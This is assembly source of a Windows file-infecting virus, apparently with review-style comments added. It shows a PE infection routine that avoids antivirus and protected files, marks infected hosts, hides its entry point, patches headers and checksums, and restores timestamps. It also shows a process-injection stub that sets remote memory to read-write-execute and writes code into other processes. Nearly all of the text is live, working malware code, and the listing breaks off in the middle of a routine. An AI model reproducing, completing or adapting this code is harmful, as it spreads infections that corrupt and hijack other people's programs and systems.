call [ebp+addrSetFileAttributesA-file_op_ip]
file_op_not_readonly:
push esi
push large FILE_ATTRIBUTE_ARCHIVE or FILE_ATTRIBUTE_HIDDEN
push large OPEN_EXISTING
push esi
push large FILE_SHARE_READ
push large GENERIC_WRITE or GENERIC_READ
push edi
call [ebp+addrCreateFileA-file_op_ip]
inc eax
jz file_op_fail_createfile
dec eax
push eax ;esp->file handle
lea ebx,[ebp+ftime-file_op_ip]
push ebx ;ebx->file last write time
add ebx,8
push ebx
add ebx,8
push ebx
push eax
call [ebp+addrGetFileTime-file_op_ip]
push ecx
push esp ;->file size high
push dword ptr [esp+2*4]
call [ebp+addrGetFileSize-file_op_ip]
pop ecx
inc eax
jz file_op_fail_getfilesize
dec eax
or ecx,ecx
jnz file_op_fail_getfilesize
push eax ;esp->file size
xchg eax,edi
add edi,vir_size+8+1000h ;edi=max file size
push esi
push edi
push esi
push large PAGE_READWRITE
push esi
push dword ptr [esp+5*4+4]
call [ebp+addrCreateFileMappingA-file_op_ip]
or eax,eax
jz file_op_fail_createfilemapping
push eax ; esp->save file mapping handle
push edi
push esi
push esi
push large FILE_MAP_WRITE
push eax
call [ebp+addrMapViewOfFile-file_op_ip]
or eax,eax
jz file_op_fail_mapviewoffile
push eax ;esp->save file mapping base pointer
mov [ebp+file_op_esp-file_op_ip],esp
;************************************************************************
;Now ebp->file_op_ip eax->file base(image base)
;esp->file mapping base address
;esp+4->file mapping handle
;esp+8h->file size
;esp+0ch->file handle
;esp+10h->file name pointer
;esp+14h->file attribute
;Les's begin file operation
;************************************************************************
xchg ebx,eax
SUBCALL check_pe,file_op_ip
jz short file_op_unmapping_jmp1
;Check AV file by look for 'irus' in the file
mov ecx,[esp+8]
cmp ecx,MIN_SIZE_TO_INFECT
jc file_op_unmapping
pushad
add ecx,eax
sub ecx,ebx
sub ecx,8
mov edi,eax
mov eax,'suri' ;V irus
check_av_1:
sub edi,3
scasd
loopnz short check_av_1
or ecx,ecx
popad
jnz short file_op_unmapping_jmpnz
;Let's check whether this file is under file protect,if so,not infect it,avoid WFP error
mov ecx,[ebp+addrSfcIsFileProtected-file_op_ip]
jecxz file_op_check_wfp_end
pushad
;check_wfp:
mov edi,640
sub esp,edi
mov ebx,esp
push ecx
push edi
push ebx ;lpWideCharStr
push -1
push dword ptr [esp+edi+FOPESP_BASE+4*4+8*4+10h]
push large 1 ;MB_PRECOMPOSED
push large 0 ;CP_ACP
call [ebp+addrMultiByteToWideChar-file_op_ip]
pop eax
push esp
push large 0
call eax
add esp,edi
or eax,eax
popad
file_op_unmapping_jmpnz:
jnz file_op_unmapping
file_op_check_wfp_end:
;Check whether it's a WinZip Self-Extractor file
movzx edx,word ptr [eax+14h]
mov edx,[eax+edx+18h+14h+28h] ;ebx->the second section's PointerToRawData
add edx,ebx
cmp dword ptr [edx+10h],'ZniW'
jnz not_winzip
cmp word ptr [edx+10h+4],'pi'
file_op_unmapping_jmp1:
jz file_op_unmapping
not_winzip:
;Check whether the file is a SFX(RAR file)
xor edi,edi
SUBCALL get_section_of_rva,file_op_ip
mov ecx,[edx+0ch]
add ecx,[edx+8]
mov esi,ecx
shr ecx,3
add ecx,esi
cmp ecx,[esp+FOPESP_BASE+8]
jna file_op_unmapping
add esi,ebx ;now ecx->perhaps rar file header
cmp dword ptr [esi],21726152h ;test for rar signature
jz short file_op_unmapping_jmp1
;Check infected
mov edi,[eax+28h]
SUBCALL get_section_of_rva,file_op_ip
sub edi,[edx+4]
add edi,[edx+0ch]
add edi,ebx
lea esi,[ebp+infbuffer-file_op_ip]
mov ecx,[edi]
mov [esi+host_entry_1-_start],ecx
mov cl,[edi+4]
mov [esi+host_entry_2-_start],cl
mov [ebp+entry_point-file_op_ip],edi
cmp byte ptr [edi],0e9h
jnz short check_infected_not_epo
add edi,[edi+1]
add edi,5
check_infected_not_epo:
cmp word ptr [edi-2],INF_SIGN
jnz short check_infected_end
cmp word ptr [edi+3],0h
jz file_op_unmapping_jmp1
check_infected_end:
;For EPO purpose,we must set the code section writable
or dword ptr [edx+1ch],00000020h or 00000040h or 10000000h or 20000000h or 40000000h or 80000000h ; modify section's Characteristics
lea esi,[ebp+infbuffer-file_op_ip]
mov dword ptr [ebp+blk_min_size-file_op_ip],vir_first_blk_size+8
mov dword ptr [ebp+remaind_size-file_op_ip],vir_size
xor edx,edx
mov [ebp+block_pointer-file_op_ip],edx
cld
first_section:
movzx edx,word ptr [eax+14h]
lea edx,[eax+edx+18h+8-28h] ;->before first section header.VirtualSize
next_section:
add edx,28h
mov ecx,[edx] ;VirtualSize
mov edi,[edx+8] ;SizeOfRawData
cmp ecx,edi
jna short file_op_1
xchg edi,ecx
file_op_1:
add ecx,[edx+0ch]
mov edi,vir_first_blk_size+8+38h
call is_final_section
jz short inf_at_tail
mov edi,[edx+28h+0ch]
sub edi,ecx
cmp edi,vir_first_blk_size+8
blk_min_size equ $-4
;NOTE:Next section's PointerToRawData may be 0 or less than current PointerToRawData
;if so,don't use this section.So use jl instead of jc
jl goto_next_section
inf_at_tail:
;Some PE file's .BSS(uninitialized data) and .TLS section's PointerToRawData can be 0,it doesn't take
;disk space.If infect this kind of section,the file will be damaged.So must avoid it.
cmp dword ptr [edx+0ch],0 ;this section's PointerToRawData==0?
jz goto_next_section
xchg edi,ecx
add edi,[esp]
mov dword ptr [edi],0
sub ecx,8
cmp ecx,[ebp+remaind_size-file_op_ip]
jl short file_op_8
mov ecx,[ebp+remaind_size-file_op_ip]
file_op_8:
sub [ebp+remaind_size-file_op_ip],ecx
mov dword ptr [edi+4],ecx
add edi,8
mov ebx,12345678h
block_pointer equ $-4
or ebx,ebx
jz short file_op_7
push edi
sub edi,[edx+0ch]
add edi,[edx+4]
sub edi,[esp+4]
mov [ebx-8],edi
pop edi
file_op_7:
mov [ebp+block_pointer-file_op_ip],edi
lea ebx,[ebp+infbuffer-file_op_ip+vir_first_blk_size-10h]
cmp esi,ebx ;is first block?
ja file_op_2 ;No
mov word ptr [edi-2],INF_SIGN
or dword ptr [edx+1ch],00000020h or 00000040h or 10000000h or 20000000h or 40000000h or 80000000h ; modify section's Characteristics
;Check relocation,try to implement EPO
mov ebx,[eax+28h] ;AddressOfEntryPoint
mov [esi+host_entry_rva-_start],ebx ;save host code entry
pushad
sub edi,[edx+0ch]
add edi,[edx+4]
sub edi,[esp+FOPESP_BASE+8*4]
mov [ebp+redir_entry_point-file_op_ip],edi
add edi,(_start_ip-_start)
mov [esi+host_section_rva-_start],edi ;save host code base
mov ecx,[eax+0a0h] ;Relocation RVA
or ecx,ecx
jz short chk_reloc_end
mov edi,ecx
SUBCALL get_section_of_rva,file_op_ip
sub edi,[edx+4]
add edi,[edx+0ch]
add edi,[esp+FOPESP_BASE+8*4] ;Physical address
mov esi,edi
xor ecx,ecx
next_reloc_trunk:
add esi,ecx
lodsd
mov edx,eax
lodsd
mov ecx,eax
sub ecx,8
clc
or edx,edx
jz short chk_reloc_end
cmp ebx,edx
jc short next_reloc_trunk
push edx
add edx,1000h
cmp ebx,edx
pop edx
ja short next_reloc_trunk
;Found the fit trunk
shr ecx,1
xor eax,eax
mov edi,edx
chk_reloc_1:
lodsw
or eax,eax
jz short chk_reloc_end
and eax,0fffh
add edx,eax
mov eax,ebx
sub eax,3
cmp edx,eax
jc short chk_reloc_2
add eax,8
cmp edx,eax
jc short chk_reloc_3
chk_reloc_2:
mov edx,edi
loop chk_reloc_1
chk_reloc_3:
or ecx,ecx
chk_reloc_end:
popad
mov dword ptr [eax+28h],12345678h
redir_entry_point equ $-4
pushad
jnz short epo_end
mov [eax+28h],ebx ;restore entry point
mov ebx,12345678h
entry_point equ $-4
mov byte ptr [ebx],0e9h
sub edi,[esp+8*4]
sub edi,[edx+0ch]
add edi,[edx+4]
sub edi,[eax+28h]
sub edi,5
mov [ebx+1],edi
epo_end:
popad
file_op_2:
mov dword ptr [ebp+blk_min_size-file_op_ip],INF_MIN_BLK_SIZE
pushad
sub edi,[edx+0ch]
add edi,[edx+4]
mov ebx,[edx] ;VirtualSize
mov edi,[edx+8] ;SizeOfRawData
xor esi,esi
cmp ebx,edi
jna short file_op_3
xchg edi,ebx
inc esi
file_op_3:
add ebx,ecx
add ebx,8
file_op_4:
cmp ebx,edi ;is bigger one less than small one?
jna short file_op_5 ;no
add edi,[eax+3ch] ;FileAlignment
jmp short file_op_4
file_op_5:
or esi,esi
jz short file_op_6
xchg edi,ebx
file_op_6:
mov [edx],ebx
mov [edx+8],edi
popad
rep movsb
or dword ptr [edx+1ch],00000040h or 40000000h; modify section's Characteristics
and dword ptr [edx+1ch],not 02020000 ;delete discardable Characteristics
goto_next_section:
mov ecx,vir_size
remaind_size equ $-4
jecxz file_op_ok
call is_final_section
jnz next_section
jmp first_section
file_op_ok:
xor edi,edi
SUBCALL get_section_of_rva,file_op_ip
;Round image size
mov ecx,[edx]
add ecx,[edx+4]
mov ebx,[eax+50h]
file_op_9:
cmp ecx,ebx
jbe short file_op_10
add ebx,[eax+38h]
jmp short file_op_9
file_op_10:
mov [eax+50h],ebx
;Round physical size
mov ecx,[edx+8]
add ecx,[edx+0ch]
cmp ecx,[esp+8]
jc short file_op_11
mov [esp+8],ecx
file_op_11:
pop esi ;esi=file base
push esi
mov byte ptr [esi+MEM_INF_POS],MEM_INF_SIGN ;Set memory infected sign.
;Recalculate checksum if there is any
lea ebx,[eax+58h]
mov ecx,[ebx] ;Is the checksum zero?
jecxz no_checksum ;Yes,it's zero,nothing to do;
;Now let me calculate the checksum
mov dword ptr [ebx],0 ;zero the checksum
mov ecx,[esp+8] ;the file size
push ecx ;the file size after infect
shr ecx,1
xor edx,edx
checksum_loop:
movzxeax, word ptr [esi]
addedx, eax
moveax, edx
andedx, 0ffffh
shreax, 10h
addedx, eax
inc esi
inc esi
loop checksum_loop
moveax, edx
shreax, 10h
addax, dx
pop ecx
addeax,ecx
;Now eax is the checksum,store it
mov [ebx],eax
no_checksum:
file_op_unmapping:
mov esp,12345678h
file_op_esp equ $-4
;Now esp have point to file mapping base pointer
call [ebp+addrUnmapViewOfFile-file_op_ip]
file_op_fail_mapviewoffile:
call [ebp+addrCloseHandle-file_op_ip] ;Close file mapping
file_op_fail_createfilemapping:
pop eax ;eax=file size
push large 0
push large 0
push eax
push dword ptr [esp+4*3]
call [ebp+addrSetFilePointer-file_op_ip]
push dword ptr [esp]
call [ebp+addrSetEndOfFile-file_op_ip] ;truncate the file to fit size
file_op_fail_getfilesize:
pop eax
push eax
lea ebx,[ebp+ftime-file_op_ip]
push ebx ;ebx->file last write time
add ebx,8
push ebx
add ebx,8
push ebx
push eax
call [ebp+addrSetFileTime-file_op_ip]
call [ebp+addrCloseHandle-file_op_ip] ;Close file
file_op_fail_createfile:
call [ebp+addrSetFileAttributesA-file_op_ip]
xor ecx,ecx
POP DWord Ptr FS:[ecx] ; restore except chain
pop ecx
pop ecx
file_op_ret:
popad
retn
;-----------------------------------------------------------------------
; file_op_seh -- SEH handler active while the mapped host file is rewritten.
; The frame is installed before the part of file_op in view; it is unlinked at
; file_op_fail_createfile ("POP DWord Ptr FS:[ecx]").
; In  : standard x86 SEH handler frame -- [esp+4]=ExceptionRecord,
;       [esp+8]=EstablisherFrame, [esp+0Ch]=ContextRecord
; Out : eax = 0 (ExceptionContinueExecution) with ContextRecord.Eip rewritten
;       to file_op_unmapping, which reloads esp from the self-patched immediate
;       at file_op_esp and then unmaps/closes everything.
; Notes:
;   - The ExceptionRecord is never inspected: every fault (e.g. an out-of-view
;     access driven by a malformed section table) is silently turned into
;     "unmap, truncate, close".
;   - Only Eip is repaired; all other register state in the CONTEXT is left as
;     it was at the fault, so file_op_unmapping relies solely on file_op_esp.
;   - NOTE(review): the handler address is computed at run time (call/pop) and
;     is not in any SafeSEH table -- a SafeSEH/SEHOP-enforcing loader would
;     presumably reject this frame; not decidable from this listing.
;-----------------------------------------------------------------------
file_op_seh:
call file_op_seh_ip
file_op_seh_ip:
pop eax                                 ; eax = run-time address of file_op_seh_ip
lea eax,[eax-(file_op_seh_ip-file_op_unmapping)] ; eax = run-time address of file_op_unmapping
PUSH eax                                ; park it; popped straight into the CONTEXT below
MOV EAX,[ESP + 00Ch+4] ; context       ; ContextRecord (+0Ch in the frame, +4 for the push above)
POP DWord Ptr [EAX + 0B8h] ; context.eip = @ExceptProc  ; CONTEXT.Eip (x86 offset 0B8h) <- file_op_unmapping
XOR EAX,EAX ; 0 = ExceptionContinueExecution
RET
;-----------------------------------------------------------------------
; is_final_section -- is the section header in edx the image's last one?
; In  : edx -> current IMAGE_SECTION_HEADER (points at its VirtualSize field,
;       i.e. the header start), eax -> PE header, ebx -> mapped file base,
;       ebp -> file_op_ip (delta base)
; Out : ZF set   -> edx is the final section
;       ZF clear -> it is not
; All registers are preserved (pushad/popad); only EFLAGS carries the result,
; which works because popad does not modify EFLAGS.
; The reference header comes from get_section_of_rva called with edi = 0. The
; same call is used at not_winzip and file_op_ok, where VirtualSize+
; VirtualAddress / SizeOfRawData+PointerToRawData of the returned header are
; treated as the image/file end, so with RVA 0 it evidently yields the last
; section header (get_section_of_rva itself is not in view -- confirm).
;-----------------------------------------------------------------------
is_final_section:
pushad
mov ecx,edx                             ; keep the caller's section header
xor edi,edi                             ; RVA 0 -> "last section" lookup (see note above)
SUBCALL get_section_of_rva,file_op_ip   ; edx <- located section header
cmp ecx,edx                             ; ZF = (current == last)
popad                                   ; restores registers, leaves ZF from the cmp
retn
is_final_section_end:
file_operate_end:
;*******************************infect.asm end*****************************
;*******************************infproc.asm*****************************
;include infproc.asm
;-----------------------------------------------------------------------
; inject_code -- position-independent stub copied into another process.
; It ends with "push <inject_code_raw_api> / retn", i.e. it tail-jumps to an
; address patched in at inject_code_raw_api, so the stub evidently sits in
; front of some original routine of the target (presumably an API entry; the
; installing side, inf_proc, is not fully in view).
; First execution : save regs/flags, OpenFileMappingA(FILE_MAP_WRITE, FALSE,
;                   FMAP_NAME), MapViewOfFile(h, FILE_MAP_WRITE, 0, 0, 0), call
;                   main_enter inside that view with ebp = _start_ip delta,
;                   then patch the leading "jmp short" so that every later
;                   execution skips straight to inject_code_goto_raw_1.
; Failure path    : if the mapping cannot be opened or mapped, restore
;                   regs/flags and fall through to the tail-jump; the patch is
;                   NOT applied, so the next call retries.
; Patched immediates (12345678 placeholders, fixed up by the installer):
;   inject_code_openfilemapping -> OpenFileMappingA
;   inject_code_mapviewoffile   -> MapViewOfFile
;   inject_code_raw_api         -> continuation address
; Security notes:
;   - The stub trusts whatever object carries the name FMAP_NAME: no check of
;     the view's size or contents is made before "call eax" into it.
;   - The view is mapped FILE_MAP_WRITE and then executed. NOTE(review):
;     without FILE_MAP_EXECUTE this would fault under DEP -- not decidable
;     from this listing.
;   - Neither the mapping handle nor the view is released in this stub
;     (main_enter may do so; not visible here).
;-----------------------------------------------------------------------
CALLHEADER inject_code
inject_code:
jmp short $+2                           ; EB 00: rel8 is zero here (fall through); rewritten below
inject_code_flow equ $-1                ; -> the rel8 displacement byte of that jmp
pushad
pushfd
call inject_code_ip
inject_code_ip:
pop ebp                                 ; ebp = run-time address of inject_code_ip (delta base)
xor esi,esi                             ; esi = 0, reused for every zero/FALSE argument
call inject_code_1                      ; pushes &FMAP_NAME (the bytes that follow) as lpName
db FMAP_NAME
inject_code_1:
push esi                                ; bInheritHandle = FALSE
push large FILE_MAP_WRITE               ; dwDesiredAccess
mov edx,12345678h
inject_code_openfilemapping equ $-4     ; patched: OpenFileMappingA
call edx                                ; OpenFileMappingA(FILE_MAP_WRITE, FALSE, FMAP_NAME)
or eax,eax
jz short inject_code_goto_raw           ; no such mapping -> plain pass-through
push esi                                ; dwNumberOfBytesToMap = 0 (whole mapping)
push esi                                ; dwFileOffsetLow  = 0
push esi                                ; dwFileOffsetHigh = 0
push large FILE_MAP_WRITE               ; dwDesiredAccess
push eax                                ; hFileMappingObject
mov edx,12345678                        ; decimal placeholder (the others are 12345678h); harmless, it is overwritten
inject_code_mapviewoffile equ $-4       ; patched: MapViewOfFile
call edx                                ; MapViewOfFile(...) -> eax = view base
or eax,eax
jz short inject_code_goto_raw           ; map failed (the mapping handle is not closed here)
; Self-modify: make the entry "jmp short" land on inject_code_goto_raw_1 from now on.
; rel8 = target - (address of the byte after the displacement) = goto_raw_1 - flow - 1.
mov byte ptr [ebp+inject_code_flow-inject_code_ip],inject_code_goto_raw_1-inject_code_flow-1
lea ebp,[eax+_start_ip-vir_header]      ; ebp = delta base the main body expects
add eax,main_enter-vir_header           ; eax = main_enter inside the view
call eax                                ; run the main body out of the shared mapping
inject_code_goto_raw:
popfd
popad
inject_code_goto_raw_1:
push large 12345678h
inject_code_raw_api equ $-4             ; patched: continuation address
retn                                    ; tail-jump; the caller's own return address is left in place
inject_code_end:
inject_code_size equ $-inject_code
;-----------------------------------------------------------------------
; virtual_protect -- VirtualProtectEx(edi, ebx, INFPROC_PROT_SIZE,
;                    PAGE_EXECUTE_READWRITE, &old)
; In  : edi = target process handle, ebx -> address in the target to unprotect,
;       ebp -> inf_proc_ip (delta base)
; Out : ZF set -> call failed (eax was 0); ZF clear -> success.
;       All registers preserved (popad leaves EFLAGS alone, so the ZF from
;       "or eax,eax" survives).
; Note: the previous protection is written into a throw-away stack slot and
;       discarded, so it is never restored -- the region stays RWX.
;-----------------------------------------------------------------------
CALLHEADER virtual_protect
virtual_protect:
pushad
push ecx                                ; reserve a dword for lpflOldProtect (ecx's value is irrelevant)
push esp                                ; lpflOldProtect -> that slot
push large PAGE_EXECUTE_READWRITE       ; flNewProtect
push large INFPROC_PROT_SIZE            ; dwSize
push ebx                                ; lpAddress
push edi                                ; hProcess
call [ebp+addrVirtualProtectEx-inf_proc_ip]
pop ecx                                 ; drop the old-protect slot
or eax,eax                              ; ZF = (result == 0)
popad
retn
virtual_protect_end:
;-----------------------------------------------------------------------
; read_proc_mem -- ReadProcessMemory(edi, ebx, vbuffer, INFPROC_MAP_SIZE, &n)
; In  : edi = target process handle, ebx = address in the target to read,
;       ebp -> inf_proc_ip (delta base)
; Out : eax -> vbuffer (loaded BEFORE pushad, so it is the one register that
;       changes); INFPROC_MAP_SIZE bytes land in vbuffer on success.
;       ZF set -> call failed, ZF clear -> success (same "or eax,eax" idiom as
;       virtual_protect; the original header did not mention it).
; Note: the byte count returned through the stack slot is discarded and
;       vbuffer is not cleared on failure -- callers must test ZF before
;       trusting its contents.
;-----------------------------------------------------------------------
CALLHEADER read_proc_mem
read_proc_mem:
lea eax,[ebp+vbuffer-inf_proc_ip]       ; eax = &vbuffer (returned to the caller)
pushad
push ecx                                ; slot for lpNumberOfBytesRead
push esp                                ; lpNumberOfBytesRead -> that slot
push large INFPROC_MAP_SIZE             ; nSize
push eax                                ; lpBuffer = vbuffer
push ebx                                ; lpBaseAddress
push edi                                ; hProcess
call [ebp+addrReadProcessMemory-inf_proc_ip]
pop ecx                                 ; drop the byte-count slot
or eax,eax                              ; ZF = (result == 0)
popad
retn
read_proc_mem_end:
;-----------------------------------------------------------------------
; write_proc_mem -- WriteProcessMemory(edi, ebx, eax, ecx, &n)
; In  : edi = target process handle, ebx = address in the target to write,
;       eax -> source buffer (the original header says vbuffer, but the code
;       writes from whatever eax points at), ecx = number of bytes,
;       ebp -> inf_proc_ip (delta base)
; Out : ZF set -> call failed, ZF clear -> success; all registers preserved
;       (same "or eax,eax" / popad idiom as virtual_protect).
; Note: the written-byte count is discarded, as in read_proc_mem; a short
;       write would only be visible through the return value.
;-----------------------------------------------------------------------
CALLHEADER write_proc_mem
write_proc_mem:
pushad
push ecx                                ; slot for lpNumberOfBytesWritten
push esp                                ; lpNumberOfBytesWritten -> that slot
push ecx                                ; nSize (ecx still holds the caller's count)
push eax                                ; lpBuffer
push ebx                                ; lpBaseAddress
push edi                                ; hProcess
call [ebp+addrWriteProcessMemory-inf_proc_ip]
pop ecx                                 ; drop the byte-count slot
or eax,eax                              ; ZF = (result == 0)
popad
retn
write_proc_mem_end:
;in--edi=process handle,ebx->process base address
CALLHEADER inf_proc
inf_proc:
pushad
call inf_proc_ip
inf_proc_ip:
pop ebp
push ebp
lea esi,[ebp+inf_proc_seh-inf_proc_ip]
push esi
xor esi,esi
push dword ptr fs:[esi]
mov fs:[esi],esp